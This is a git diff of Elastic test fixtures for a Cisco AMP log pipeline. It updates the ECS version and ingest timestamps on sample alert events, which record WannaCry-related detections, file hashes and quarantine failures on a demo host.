Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -7489,7 +7489,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -7521,7 +7521,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843790009Z", + "ingested": "2021-09-13T18:07:04.510500626Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":845000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -7578,7 +7578,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -7610,7 +7610,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843791900Z", + "ingested": "2021-09-13T18:07:04.510506069Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":798000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -7667,7 +7667,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -7699,7 +7699,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843793783Z", + "ingested": "2021-09-13T18:07:04.510508336Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":767000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -7756,7 +7756,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -7788,7 +7788,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843795681Z", + "ingested": "2021-09-13T18:07:04.510510239Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -7845,7 +7845,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -7877,7 +7877,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843806383Z", + "ingested": "2021-09-13T18:07:04.510512116Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":735000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -7939,7 +7939,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -7969,7 +7969,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843808566Z", + "ingested": "2021-09-13T18:07:04.510513970Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -8028,7 +8028,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -8058,7 +8058,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843810485Z", + "ingested": "2021-09-13T18:07:04.510515850Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Threat Detected", diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log similarity index 100% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log 
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log-expected.json similarity index 98% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log-expected.json rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log-expected.json index 485829d5bda..e0b337505a5 100644 --- a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp5.ndjson.log-expected.json +++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp5.log-expected.json @@ -19,7 +19,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -51,7 +51,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500123245Z", + "ingested": "2021-09-13T18:07:28.111129724Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":96000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -108,7 +108,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -128,7 +128,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500128111Z", + "ingested": "2021-09-13T18:07:28.111134931Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":862000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -183,7 +183,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -203,7 +203,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500130418Z", + "ingested": "2021-09-13T18:07:28.111137209Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":659000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -260,7 +260,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -290,7 +290,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500132533Z", + "ingested": "2021-09-13T18:07:28.111139358Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":831000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -356,7 +356,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -388,7 +388,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500134723Z", + "ingested": "2021-09-13T18:07:28.111141503Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":706000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -458,7 +458,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -490,7 +490,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:54.500136852Z", + "ingested": "2021-09-13T18:07:28.111143609Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -547,7 +547,7 @@
 }
 },
 "ecs": {
- "version": "1.11.0"
+ "version": "1.12.0"
 },
 "related": {
 "hosts": [
@@ -567,7 +567,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-09-12T17:31:54.500138978Z",
+ "ingested": "2021-09-13T18:07:28.111145703Z",
